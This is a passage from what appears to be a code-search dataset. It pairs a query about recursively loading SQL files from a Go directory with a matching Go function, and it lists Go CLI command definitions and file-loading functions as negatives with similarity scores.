auth.Login(db),\n\t\tRunE: opts.runAdd(db, r),\n\t\tPostRun: func(cmd *cobra.Command, args []string) {\n\t\t\topts = addOptions{}\n\t\t},\n\t}\n\n\tcmd.Flags().IntVarP(&opts.digits, \"digits\", \"d\", 6, \"TOTP length {6|7|8}\")\n\n\treturn cmd\n}", "func NewPurgeCmd(f factory.Factory, globalFlags *flags.GlobalFlags, rawConfig *RawConfig) *cobra.Command {\n\tcmd := &RunPipelineCmd{\n\t\tGlobalFlags: globalFlags,\n\t\tPipeline: \"purge\",\n\t\tSkipPushLocalKubernetes: true,\n\t}\n\n\tvar pipeline *latest.Pipeline\n\tif rawConfig != nil && rawConfig.Config != nil && rawConfig.Config.Pipelines != nil {\n\t\tpipeline = rawConfig.Config.Pipelines[\"purge\"]\n\t}\n\tpurgeCmd := &cobra.Command{\n\t\tUse: \"purge\",\n\t\tShort: \"Deletes deployed resources\",\n\t\tLong: `\n#######################################################\n################### devspace purge ####################\n#######################################################\nDeletes the deployed kubernetes resources:\n\ndevspace purge\n#######################################################`,\n\t\tRunE: func(cobraCmd *cobra.Command, args []string) error {\n\t\t\treturn cmd.Run(cobraCmd, args, f, \"purgeCommand\")\n\t\t},\n\t}\n\tcmd.AddPipelineFlags(f, purgeCmd, pipeline)\n\treturn purgeCmd\n}", "func newPlanCmd() *cobra.Command {\n\tpc := &planCmd{}\n\n\tplanCmd := &cobra.Command{\n\t\tUse: \"plan [-f SORUCE]\",\n\t\tShort: \"Generate and show an execution plan\",\n\t\tLong: planLong,\n\t\tExample: planExample,\n\t\tDisableFlagsInUseLine: true,\n\t\tSilenceUsage: true,\n\t\tSilenceErrors: true,\n\t\tArgs: cobra.MaximumNArgs(0),\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tif err := pc.meta.init(args); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\treturn pc.run(args)\n\t\t},\n\t}\n\n\tf := planCmd.Flags()\n\tf.BoolVar(&pc.destroy, \"destroy\", false, \"create plan to destroy resources\")\n\n\tpc.addMetaFlags(planCmd)\n\n\treturn planCmd\n}", "func NewCommand() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Version for apisix-mesh-agent\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tfmt.Println(version.String())\n\t\t},\n\t}\n\treturn cmd\n}", "func NewAttachCmd(f factory.Factory, globalFlags *flags.GlobalFlags) *cobra.Command {\n\tcmd := &AttachCmd{GlobalFlags: globalFlags}\n\n\tattachCmd := &cobra.Command{\n\t\tUse: \"attach\",\n\t\tShort: \"Attaches to a container\",\n\t\tLong: `\n#######################################################\n################# devspace attach #####################\n#######################################################\nAttaches to a running container\n\ndevspace attach\ndevspace attach --pick # Select pod to enter\ndevspace attach -c my-container\ndevspace attach -n my-namespace\n#######################################################`,\n\t\tRunE: func(cobraCmd *cobra.Command, args []string) error {\n\t\t\tplugin.SetPluginCommand(cobraCmd, args)\n\t\t\treturn cmd.Run(f, cobraCmd, args)\n\t\t},\n\t}\n\n\tattachCmd.Flags().StringVarP(&cmd.Container, \"container\", \"c\", \"\", \"Container name within pod where to execute command\")\n\tattachCmd.Flags().StringVar(&cmd.Pod, \"pod\", \"\", \"Pod to open a shell to\")\n\tattachCmd.Flags().StringVar(&cmd.ImageSelector, \"image-selector\", \"\", \"The image to search a pod for (e.g. nginx, nginx:latest, image(app), nginx:tag(app))\")\n\tattachCmd.Flags().StringVar(&cmd.Image, \"image\", \"\", \"Image is the config name of an image to select in the devspace config (e.g. 'default'), it is NOT a docker image like myuser/myimage\")\n\tattachCmd.Flags().StringVarP(&cmd.LabelSelector, \"label-selector\", \"l\", \"\", \"Comma separated key=value selector list (e.g. release=test)\")\n\n\tattachCmd.Flags().BoolVar(&cmd.Pick, \"pick\", true, \"Select a pod\")\n\n\treturn attachCmd\n}", "func NewPurgeCmd() *cobra.Command {\n\tcmd := &PurgeCmd{}\n\n\tpurgeCmd := &cobra.Command{\n\t\tUse: \"purge\",\n\t\tShort: \"Delete deployed resources\",\n\t\tLong: `\n#######################################################\n################### devspace purge ####################\n#######################################################\nDeletes the deployed kuberenetes resources:\n\ndevspace purge\ndevspace purge -d my-deployment\n#######################################################`,\n\t\tArgs: cobra.NoArgs,\n\t\tRun: cmd.Run,\n\t}\n\n\tpurgeCmd.Flags().StringVarP(&cmd.Deployments, \"deployments\", \"d\", \"\", \"The deployment to delete (You can specify multiple deployments comma-separated, e.g. devspace-default,devspace-database etc.)\")\n\n\treturn purgeCmd\n}", "func NewPluginCommand(cmd *cobra.Command, dockerCli *client.DockerCli) {\n}", "func NewCmdNewApplication(f kcmdutil.Factory, streams genericclioptions.IOStreams) *cobra.Command {\n\to := NewAppOptions(streams)\n\n\tcmd := &cobra.Command{\n\t\tUse: \"new-app (IMAGE | IMAGESTREAM | TEMPLATE | PATH | URL ...)\",\n\t\tShort: \"Create a new application\",\n\t\tLong: newAppLong,\n\t\tExample: newAppExample,\n\t\tSuggestFor: []string{\"app\", \"application\"},\n\t\tRun: func(c *cobra.Command, args []string) {\n\t\t\tkcmdutil.CheckErr(o.Complete(f, c, args))\n\t\t\tkcmdutil.CheckErr(o.RunNewApp())\n\t\t},\n\t}\n\n\to.PrintFlags.AddFlags(cmd)\n\n\tcmd.Flags().BoolVar(&o.Config.AsTestDeployment, \"as-test\", o.Config.AsTestDeployment, \"If true create this application as a test deployment, which validates that the deployment succeeds and then scales down.\")\n\tcmd.Flags().BoolVar(&o.Config.DeploymentConfig, \"as-deployment-config\", o.Config.DeploymentConfig, \"If true create this application as a deployment config, which allows for hooks and custom strategies.\")\n\tcmd.Flags().StringSliceVar(&o.Config.SourceRepositories, \"code\", o.Config.SourceRepositories, \"Source code to use to build this application.\")\n\tcmd.Flags().StringVar(&o.Config.ContextDir, \"context-dir\", o.Config.ContextDir, \"Context directory to be used for the build.\")\n\tcmd.Flags().StringSliceVarP(&o.Config.ImageStreams, \"image-stream\", \"i\", o.Config.ImageStreams, \"Name of an existing image stream to use to deploy an app.\")\n\tcmd.Flags().StringSliceVar(&o.Config.DockerImages, \"image\", o.Config.DockerImages, \"Name of a container image to include in the app. Note: not specifying a registry or repository means defaults in place for client image pulls are employed.\")\n\tcmd.Flags().StringSliceVar(&o.Config.DockerImages, \"docker-image\", o.Config.DockerImages, \"\")\n\tcmd.Flags().MarkDeprecated(\"docker-image\", \"Deprecated flag use --image\")\n\tcmd.Flags().StringSliceVar(&o.Config.Templates, \"template\", o.Config.Templates, \"Name of a stored template to use in the app.\")\n\tcmd.Flags().StringSliceVarP(&o.Config.TemplateFiles, \"file\", \"f\", o.Config.TemplateFiles, \"Path to a template file to use for the app.\")\n\tcmd.MarkFlagFilename(\"file\", \"yaml\", \"yml\", \"json\")\n\tcmd.Flags().StringArrayVarP(&o.Config.TemplateParameters, \"param\", \"p\", o.Config.TemplateParameters, \"Specify a key-value pair (e.g., -p FOO=BAR) to set/override a parameter value in the template.\")\n\tcmd.Flags().StringArrayVar(&o.Config.TemplateParameterFiles, \"param-file\", o.Config.TemplateParameterFiles, \"File containing parameter values to set/override in the template.\")\n\tcmd.MarkFlagFilename(\"param-file\")\n\tcmd.Flags().StringSliceVar(&o.Config.Groups, \"group\", o.Config.Groups, \"Indicate components that should be grouped together as <comp1>+<comp2>.\")\n\tcmd.Flags().StringArrayVarP(&o.Config.Environment, \"env\", \"e\", o.Config.Environment, \"Specify a key-value pair for an environment variable to set into each container.\")\n\tcmd.Flags().StringArrayVar(&o.Config.EnvironmentFiles, \"env-file\", o.Config.EnvironmentFiles, \"File containing key-value pairs of environment variables to set into each container.\")\n\tcmd.MarkFlagFilename(\"env-file\")\n\tcmd.Flags().StringArrayVar(&o.Config.BuildEnvironment, \"build-env\", o.Config.BuildEnvironment, \"Specify a key-value pair for an environment variable to set into each build image.\")\n\tcmd.Flags().StringArrayVar(&o.Config.BuildEnvironmentFiles, \"build-env-file\", o.Config.BuildEnvironmentFiles, \"File containing key-value pairs of environment variables to set into each build image.\")\n\tcmd.MarkFlagFilename(\"build-env-file\")\n\tcmd.Flags().StringVar(&o.Config.Name, \"name\", o.Config.Name, \"Set name to use for generated application artifacts\")\n\tcmd.Flags().Var(&o.Config.Strategy, \"strategy\", \"Specify the build strategy to use if you don't want to detect (docker|pipeline|source). NOTICE: the pipeline strategy is deprecated; consider using Jenkinsfiles directly on Jenkins or OpenShift Pipelines.\")\n\tcmd.Flags().StringP(\"labels\", \"l\", \"\", \"Label to set in all resources for this application.\")\n\tcmd.Flags().BoolVar(&o.Config.IgnoreUnknownParameters, \"ignore-unknown-parameters\", o.Config.IgnoreUnknownParameters, \"If true, will not stop processing if a provided parameter does not exist in the template.\")\n\tcmd.Flags().BoolVar(&o.Config.InsecureRegistry, \"insecure-registry\", o.Config.InsecureRegistry, \"If true, indicates that the referenced container images are on insecure registries and should bypass certificate checking\")\n\tcmd.Flags().BoolVarP(&o.Config.AsList, \"list\", \"L\", o.Config.AsList, \"List all local templates and image streams that can be used to create.\")\n\tcmd.Flags().BoolVarP(&o.Config.AsSearch, \"search\", \"S\", o.Config.AsSearch, \"Search all templates, image streams, and container images that match the arguments provided. Note: the container images search is run on the OpenShift cluster via the ImageStreamImport API.\")\n\tcmd.Flags().BoolVar(&o.Config.AllowMissingImages, \"allow-missing-images\", o.Config.AllowMissingImages, \"If true, indicates that referenced container images that cannot be found locally or in a registry should still be used.\")\n\tcmd.Flags().BoolVar(&o.Config.AllowMissingImageStreamTags, \"allow-missing-imagestream-tags\", o.Config.AllowMissingImageStreamTags, \"If true, indicates that image stream tags that don't exist should still be used.\")\n\tcmd.Flags().BoolVar(&o.Config.AllowSecretUse, \"grant-install-rights\", o.Config.AllowSecretUse, \"If true, a component that requires access to your account may use your token to install software into your project. Only grant images you trust the right to run with your token.\")\n\tcmd.Flags().StringVar(&o.Config.SourceSecret, \"source-secret\", o.Config.SourceSecret, \"The name of an existing secret that should be used for cloning a private git repository.\")\n\tcmd.Flags().BoolVar(&o.Config.SkipGeneration, \"no-install\", o.Config.SkipGeneration, \"Do not attempt to run images that describe themselves as being installable\")\n\tcmd.Flags().BoolVar(&o.Config.BinaryBuild, \"binary\", o.Config.BinaryBuild, \"Instead of expecting a source URL, set the build to expect binary contents. Will disable triggers.\")\n\tcmd.Flags().StringVar(&o.Config.ImportMode, \"import-mode\", o.Config.ImportMode, \"Imports the full manifest list of a tag when set to 'PreserveOriginal'. Defaults to 'Legacy'.\")\n\n\to.Action.BindForOutput(cmd.Flags(), \"output\", \"template\")\n\tcmd.Flags().String(\"output-version\", \"\", \"The preferred API versions of the output objects\")\n\n\treturn cmd\n}", "func NewExportCommand(ctx context.Context) *cobra.Command {\n\topts := &ExportOptions{}\n\tcmd := &cobra.Command{\n\t\tUse: \"export COMPONENT_ARCHIVE_PATH [-o output-dir/file] [-f {fs|tar|tgz}]\",\n\t\tArgs: cobra.ExactArgs(1),\n\t\tShort: \"Exports a component archive as defined by CTF\",\n\t\tLong: `\nExport command exports a component archive as defined by CTF (CNUDIE Transport Format).\nIf the given component-archive path points to a directory, the archive is expected to be a extracted component-archive on the filesystem.\nThen it is exported as tar or optionally as compressed tar.\n\nIf the given path points to a file, the archive is read as tar or compressed tar (tar.gz) and exported as filesystem to the given location.\n`,\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tif err := opts.Complete(args); err != nil {\n\t\t\t\tfmt.Println(err.Error())\n\t\t\t\tos.Exit(1)\n\t\t\t}\n\t\t\tif err := opts.Run(ctx, osfs.New()); err != nil {\n\t\t\t\tfmt.Println(err.Error())\n\t\t\t\tos.Exit(1)\n\t\t\t}\n\t\t\tfmt.Printf(\"Successfully exported component archive to %s\\n\", opts.OutputPath)\n\t\t},\n\t}\n\topts.AddFlags(cmd.Flags())\n\treturn cmd\n}" ]
[ "0.6740657", "0.6685995", "0.6685378", "0.6652252", "0.66018087", "0.65894043", "0.65083665", "0.6456303", "0.64481395", "0.6446897", "0.64370805", "0.6433159", "0.64153534", "0.63907087", "0.63795507", "0.63594395", "0.633699", "0.63093776", "0.63058627", "0.62995654", "0.6299279", "0.6288317", "0.6273053", "0.626239", "0.6259076", "0.6253954", "0.6247525", "0.6196881", "0.61835283", "0.6171813", "0.61584836", "0.6154289", "0.6152844", "0.61473495", "0.614666", "0.61372656", "0.6136717", "0.61362624", "0.6122823", "0.60950327", "0.60929066", "0.6086676", "0.6081865", "0.6078874", "0.606882", "0.60686404", "0.6064136", "0.6063726", "0.6059593", "0.60480255", "0.60180414", "0.60133547", "0.6010556", "0.6006248", "0.600207", "0.5994043", "0.5988063", "0.59780115", "0.59749186", "0.5972182", "0.59711623", "0.5969938", "0.59574556", "0.59527105", "0.595202", "0.5936809", "0.5934779", "0.59332734", "0.5931099", "0.5927303", "0.5923372", "0.59222424", "0.59197956", "0.5918537", "0.5913424", "0.5910269", "0.5906335", "0.59057814", "0.58949083", "0.5887379", "0.58838826", "0.58828133", "0.58732176", "0.58669114", "0.5865073", "0.5864096", "0.58637995", "0.5858671", "0.5857639", "0.5857543", "0.5857543", "0.58547086", "0.5850926", "0.58447224", "0.5832732", "0.5818604", "0.5816997", "0.58122915", "0.5811757", "0.5807872" ]
0.8364528
0
Dir recursively loads all .sql files from a specified folder and returns them as a hashmap
func Dir(dir string) (queries map[string]QuerySet, err error) { var files []File if files, err = DirOrdered(dir); err != nil { return } queries = make(map[string]QuerySet, len(files)) for _, f := range files { queries[f.Name] = make(QuerySet, len(f.Items)) for _, i := range f.Items { queries[f.Name][i.Name] = i.Query } } return queries, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func loadScriptsFromDir(dir string) ([]string, error) {\n\tstats, err := ioutil.ReadDir(dir)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Filter out directories, files without a .sql extension.\n\tvar filtered []string\n\tfor _, f := range stats {\n\t\tif f.IsDir() {\n\t\t\tcontinue\n\t\t}\n\t\text := strings.ToLower(filepath.Ext(f.Name()))\n\t\tif ext == \".sql\" {\n\t\t\tfiltered = append(filtered, filepath.Join(dir, f.Name()))\n\t\t}\n\t}\n\n\t// Sort them, which determines execution order.\n\tsort.Strings(filtered)\n\treturn filtered, nil\n}", "func sqlFiles(dirPath, repoBase string) (result []string, err error) {\n\tentries, err := os.ReadDir(dirPath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, entry := range entries {\n\t\tname := entry.Name()\n\t\tfi, err := entry.Info()\n\t\tif err != nil {\n\t\t\tcontinue\n\t\t}\n\t\t// symlinks: verify it points to an existing file within repoBase. If it\n\t\t// does not, or if any error occurs in any step in checking, skip it.\n\t\tif fi.Mode()&os.ModeSymlink == os.ModeSymlink {\n\t\t\tdest, err := os.Readlink(filepath.Join(dirPath, name))\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tdest = filepath.Clean(dest)\n\t\t\tif !filepath.IsAbs(dest) {\n\t\t\t\tif dest, err = filepath.Abs(filepath.Join(dirPath, dest)); err != nil {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t}\n\t\t\tif !strings.HasPrefix(dest, repoBase) {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\t// Make fi now point to the symlink destination. Lstat is used here to\n\t\t\t// intentionally only allow one level of indirection; multi-hop symlinks\n\t\t\t// will get filtered out by the fi.Mode().IsRegular() check below.\n\t\t\tif fi, err = os.Lstat(dest); err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t\tif destName := fi.Name(); strings.HasSuffix(destName, \".sql\") && fi.Mode().IsRegular() {\n\t\t\t// Note we intentionally use name, not destName, here. For symlinks we want\n\t\t\t// to return the symlink, not the destination, since the destination could\n\t\t\t// be in a different directory.\n\t\t\tresult = append(result, name)\n\t\t}\n\t}\n\treturn result, nil\n}", "func all() (map[string]*Migration, error) {\n\tmigrations := map[string]*Migration{}\n\n\tdir, err := FS.Open(config.MigrationsPath)\n\tif err != nil {\n\t\treturn migrations, err\n\t}\n\n\tfiles, err := dir.Readdir(0)\n\tif err != nil {\n\t\treturn migrations, err\n\t}\n\n\tfor _, file := range files {\n\t\tif valid(file.Name()) {\n\t\t\tid := migrationID(file.Name())\n\t\t\tif _, ok := migrations[id]; !ok {\n\t\t\t\tmigrations[id] = &Migration{\n\t\t\t\t\tID: id,\n\t\t\t\t}\n\t\t\t}\n\t\t\tm := migrations[id]\n\t\t\tm.AddPath(path.Join(config.MigrationsPath, file.Name()))\n\t\t}\n\t}\n\n\treturn migrations, nil\n}", "func sqlFiles(dirPath, repoBase string) ([]SQLFile, error) {\n\tfileInfos, err := ioutil.ReadDir(dirPath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tresult := make([]SQLFile, 0, len(fileInfos))\n\tfor _, fi := range fileInfos {\n\t\tname := fi.Name()\n\t\t// symlinks: verify it points to an existing file within repoBase. If it\n\t\t// does not, or if any error occurs in any step in checking, skip it.\n\t\tif fi.Mode()&os.ModeSymlink == os.ModeSymlink {\n\t\t\tdest, err := os.Readlink(path.Join(dirPath, name))\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tdest = filepath.Clean(dest)\n\t\t\tif !filepath.IsAbs(dest) {\n\t\t\t\tif dest, err = filepath.Abs(path.Join(dirPath, dest)); err != nil {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t}\n\t\t\tif !strings.HasPrefix(dest, repoBase) {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif fi, err = os.Lstat(dest); err != nil { // using Lstat here to prevent symlinks-to-symlinks\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t\tdestName := fi.Name()\n\t\tif strings.HasSuffix(destName, \".sql\") && fi.Mode().IsRegular() {\n\t\t\tsf := SQLFile{\n\t\t\t\tDir: dirPath,\n\t\t\t\tFileName: name, // name relative to dirPath, NOT symlink destination!\n\t\t\t}\n\t\t\tresult = append(result, sf)\n\t\t}\n\t}\n\treturn result, nil\n}", "func ScanFolder(folder string) (map[string][]string, error) {\n\tfileMap := map[string][]string{}\n\terr := filepath.Walk(folder, func(path string, info os.FileInfo, err error) error {\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif info.IsDir() {\n\t\t\treturn nil\n\t\t}\n\t\tif filepath.Ext(path) != \".yaml\" && !strings.HasPrefix(filepath.Base(path), \"policy\") {\n\t\t\treturn nil\n\t\t}\n\t\tdirectoryName := filepath.Base(filepath.Dir(path))\n\t\tfileMap[directoryName] = append(fileMap[directoryName], path)\n\t\treturn nil\n\t})\n\treturn fileMap, err\n}", "func loadKeyDir(repo *Repo, dir, subdir string) (subdirs map[string]bool) {\n //NOTE2(\"Parsing key\", subdir)\n var err error\n\n // Parse subdirectory name\n var domain, lang, ver string\n domain, lang, ver, err = parseDirName(subdir)\n if err != nil {\n WARNING(\"loadKeyDir\", \"Skipping directory\", \"dir\", subdir, \"err\", err)\n return\n }\n\n subdirs = map[string]bool{}\n subdirs[\".\"] = true\n\n // Parse each file with its parser\n var key Key\n var fi os.FileInfo\n var resource Resource\n var ok bool\n var obj interface{}\n\n for f, parser := range *(repo.Parsers) {\n if parser == nil {\n continue\n }\n //NOTE(\"Parsing\", \"subdir\", subdir , \"file\", f)\n\n // Check if file exists in this key directory\n fpath := path.Join(dir, f)\n if fi, err = os.Stat(fpath); os.IsNotExist(err) {\n continue\n }\n\n // Parse and add resource\n key = Key{\n Id: f,\n File: fpath,\n ModTime: fi.ModTime(),\n Domain: domain,\n Language: lang,\n Version: ver,\n }\n obj, err = parser(key)\n if err != nil {\n SOS(\"loadKeyDir\", \n \"Error parsing resource, file skipped\", \n \"dir\", subdir, \"file\", f,\n \"err\", err)\n continue\n }\n if resource, ok = obj.(Resource); !ok {\n SOS(\"loadKeyDir\", \n \"Returned struct is not of type Resource, file skipped\",\n \"dir\", subdir, \"file\", f,\n \"err\", err)\n continue\n }\n repo.addTemp(&key, resource)\n subdirs[path.Dir(f)] = true\n }\n return\n}", "func LoadStories(dir string) (storyMap map[int]story.Story, err error) {\n\tfiles, err := ioutil.ReadDir(dir)\n\tstoryMap = make(map[int]story.Story)\n\n\tif err != nil {\n\t\terr = errors.New(\"No\" + dir + \" folder found. Aborting\")\n\n\t\treturn\n\t}\n\n\tfor index, file := range files {\n\t\tif !file.IsDir() {\n\t\t\tif file.Name() == \".gitignore\" {\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t\tloadedStory, err := load(dir + \"/\" + file.Name())\n\n\t\t\tif err != nil {\n\t\t\t\treturn storyMap, err\n\t\t\t}\n\n\t\t\tloadedStory.StoryId = index\n\t\t\tstoryMap[index] = loadedStory\n\t\t}\n\t}\n\n\treturn\n}", "func CreateSQLCache(queriesLocation ...string) (map[string]string, error) {\n\n\tif len(queriesLocation) == 0 {\n\t\tqueriesLocation = append(queriesLocation, \"./queries/*.sql\")\n\t}\n\n\tmyCache := map[string]string{}\n\tvar queries []string\n\tvar err error\n\n\tfor _, queryPath := range queriesLocation {\n\t\tqueries, err = filepath.Glob(queryPath)\n\t\tif err != nil {\n\t\t\tlog.Fatal(fmt.Sprintf(\"cannot read queries from path %s\", queryPath), err)\n\t\t}\n\t}\n\n\tif len(queries) == 0 {\n\t\tlog.Fatal(\"no queries were found\")\n\t}\n\n\tfor _, query := range queries {\n\t\tname := filepath.Base(query)\n\t\tsql, err := ioutil.ReadFile(query)\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t\treturn myCache, err\n\t\t}\n\t\tmyCache[name] = string(sql)\n\t}\n\n\treturn myCache, nil\n}", "func loadFiles(path string) (files map[string][]byte, err error) {\n\tfiles = make(map[string][]byte)\n\tfileInfo, err := ioutil.ReadDir(path)\n\tif err != nil {\n\t\treturn files, err\n\t}\n\tfor _, file := range fileInfo {\n\t\tif file.IsDir() {\n\t\t\tcontinue\n\t\t}\n\t\tdata, err := ioutil.ReadFile(filepath.Join(path, file.Name()))\n\t\tif err != nil {\n\t\t\treturn files, err\n\t\t}\n\t\tfiles[file.Name()] = data\n\t}\n\treturn files, nil\n}", "func (p *FileMap) loadFilesRecursively(cwd string) error {\n\tfileList, err := ioutil.ReadDir(cwd)\n\n\tif err != nil {\n\t\terr = StringError{s: \"ERROR: Can't open \\\"\" + cwd + \"\\\" directory!\"}\n\t\treturn err\n\t}\n\n\tfor _, f := range fileList {\n\t\tfileName := f.Name()\n\n\t\tif f.IsDir() {\n\t\t\terr := p.loadFilesRecursively(cwd + fileName + \"/\")\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(err.Error())\n\t\t\t\tcontinue\n\t\t\t}\n\t\t} else {\n\t\t\tbaseName, ext := getBaseAndExt(fileName)\n\n\t\t\t_, err := p.load(cwd+baseName, ext)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(err.Error())\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tfmt.Println(\"INFO: Loaded file: \" + cwd + filepath.Base(fileName))\n\t\t}\n\t}\n\treturn nil\n}", "func directoryFileRegistry(path string, skip []string) (map[string]string, error) {\n\tregistry := make(map[string]string)\n\n\tfound, err := utils.WalkPath(path, skip)\n\tif err != nil {\n\t\treturn registry, err\n\t}\n\n\tfor _, name := range found {\n\t\tfi, err := os.Stat(name)\n\t\tif err != nil {\n\t\t\treturn registry, err\n\t\t}\n\n\t\tif fi.Mode().IsRegular() {\n\t\t\ttrimmed := strings.TrimPrefix(name, path+\"/\")\n\t\t\tregistry[trimmed] = name\n\t\t}\n\t}\n\n\treturn registry, nil\n}", "func readModulesFromFolder() *map[string][]byte {\n\tfiles, err := os.ReadDir(outputDir)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tmodules := map[string][]byte{}\n\n\tfor _, file := range files {\n\t\tif !strings.HasSuffix(file.Name(), \".js\") {\n\t\t\tcontinue\n\t\t}\n\n\t\tid := strings.TrimSuffix(file.Name(), \".js\")\n\t\tdata, err := os.ReadFile(fmt.Sprintf(\"%v/%v\", outputDir, file.Name()))\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\n\t\tmodules[id] = data\n\t}\n\n\treturn &modules\n}", "func LoadFingerprintsDir(dname string) (*FingerprintSet, error) {\n\tres := NewFingerprintSet()\n\n\tfiles, err := ioutil.ReadDir(dname)\n\tif err != nil {\n\t\treturn res, err\n\t}\n\n\tfor _, f := range files {\n\n\t\tif !strings.Contains(f.Name(), \".xml\") {\n\t\t\tcontinue\n\t\t}\n\n\t\txmlData, err := ioutil.ReadFile(filepath.Join(dname, f.Name()))\n\t\tif err != nil {\n\t\t\treturn res, err\n\t\t}\n\n\t\tfdb, err := recog.LoadFingerprintDB(f.Name(), xmlData)\n\t\tif err != nil {\n\t\t\treturn res, err\n\t\t}\n\n\t\t// Create an alias for the file name\n\t\tres.Databases[f.Name()] = &fdb\n\n\t\t// Create an alias for the \"matches\" attribute\n\t\tres.Databases[fdb.Matches] = &fdb\n\t}\n\n\treturn res, nil\n}", "func (d *Driver) LoadAll(db, table string) ([]sql.Index, error) {\n\tvar (\n\t\tindexes []sql.Index\n\t\terrors []string\n\t\troot = filepath.Join(d.root, db, table)\n\t)\n\n\tdirs, err := ioutil.ReadDir(root)\n\tif err != nil {\n\t\tif os.IsNotExist(err) {\n\t\t\treturn indexes, nil\n\t\t}\n\t\treturn nil, err\n\t}\n\tfor _, info := range dirs {\n\t\tif info.IsDir() && !strings.HasPrefix(info.Name(), \".\") {\n\t\t\tidx, err := d.loadIndex(db, table, info.Name())\n\t\t\tif err != nil {\n\t\t\t\tif !errCorruptedIndex.Is(err) {\n\t\t\t\t\terrors = append(errors, err.Error())\n\t\t\t\t}\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tindexes = append(indexes, idx)\n\t\t}\n\t}\n\tif len(errors) > 0 {\n\t\treturn nil, fmt.Errorf(strings.Join(errors, \"\\n\"))\n\t}\n\n\treturn indexes, nil\n}", "func (d *Driver) LoadAll(db, table string) ([]sql.Index, error) {\n\tvar (\n\t\tindexes []sql.Index\n\t\terrors []string\n\t\troot = filepath.Join(d.root, db, table)\n\t)\n\n\tdirs, err := ioutil.ReadDir(root)\n\tif err != nil {\n\t\tif os.IsNotExist(err) {\n\t\t\treturn indexes, nil\n\t\t}\n\t\treturn nil, err\n\t}\n\tfor _, info := range dirs {\n\t\tif info.IsDir() && !strings.HasPrefix(info.Name(), \".\") {\n\t\t\tidx, err := d.loadIndex(db, table, info.Name())\n\t\t\tif err != nil {\n\t\t\t\tif !errCorruptedIndex.Is(err) {\n\t\t\t\t\terrors = append(errors, err.Error())\n\t\t\t\t}\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tindexes = append(indexes, idx)\n\t\t}\n\t}\n\n\tif len(errors) > 0 {\n\t\treturn nil, fmt.Errorf(strings.Join(errors, \"\\n\"))\n\t}\n\n\treturn indexes, nil\n}", "func SourceDir(dirname string) SqlSource {\n\treturn func(tx *sql.Tx) ([]string, error) {\n\t\tvar retStmts []string\n\t\tif err := filepath.Walk(dirname, func(name string, info os.FileInfo, err error) error {\n\t\t\t// skip directory\n\t\t\tif info.IsDir() {\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\t// collect .sql file only\n\t\t\tbase := filepath.Base(name)\n\t\t\tif ext := filepath.Ext(base); ext != \".sql\" {\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\tf, err := os.Open(name)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\t// parse SQL source file\n\t\t\tstmts, err := ParseSQLStatements(f)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tretStmts = append(retStmts, stmts...)\n\t\t\treturn nil\n\t\t}); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\treturn retStmts, nil\n\t}\n}", "func loadLvls() map[string]*Level {\n\n\tfilepaths, err := filepath.Glob(\"game/maps/*.map\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tlvls := make(map[string]*Level)\n\tfor _, filpth := range filepaths {\n\t\tfile, err := os.Open(filpth)\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\n\t\tscanner := bufio.NewScanner(file)\n\t\tlevelLines := make([]string, 0)\n\t\tlongestRow := 0\n\t\tindex := 0\n\t\tfor scanner.Scan() {\n\t\t\tlevelLines = append(levelLines, scanner.Text())\n\t\t\tif len(levelLines[index]) > longestRow {\n\t\t\t\tlongestRow = len(levelLines[index])\n\t\t\t}\n\t\t\tindex++\n\t\t}\n\t\tlevel := &Level{}\n\t\tlevel.Events = make([]string, 0)\n\t\tlevel.Monsters = make([]*Monster, 0)\n\t\tlevel.Map = make([][]Tile, len(levelLines))\n\t\tlevel.Portals = make(map[Pos]levelPos)\n\t\tlevel.Debug = make(map[Pos]bool)\n\t\tfor i := range level.Map {\n\t\t\tlevel.Map[i] = make([]Tile, longestRow)\n\t\t}\n\t\tfor y := 0; y < len(level.Map); y++ {\n\t\t\tline := levelLines[y]\n\t\t\tvar t rune\n\t\t\tfor x, e := range line {\n\t\t\t\tswitch e {\n\t\t\t\tcase ' ', '\\t', '\\n', '\\r':\n\t\t\t\t\tt = Void\n\t\t\t\tcase '#':\n\t\t\t\t\tt = StoneWall\n\t\t\t\tcase '.':\n\t\t\t\t\tt = DirtFloor\n\t\t\t\tcase '|', '/':\n\t\t\t\t\tt = CloseDoor\n\t\t\t\tcase 'R':\n\t\t\t\t\tt = DirtFloor\n\t\t\t\t\tlevel.Monsters = append(level.Monsters, NewRat(int32(x*32), 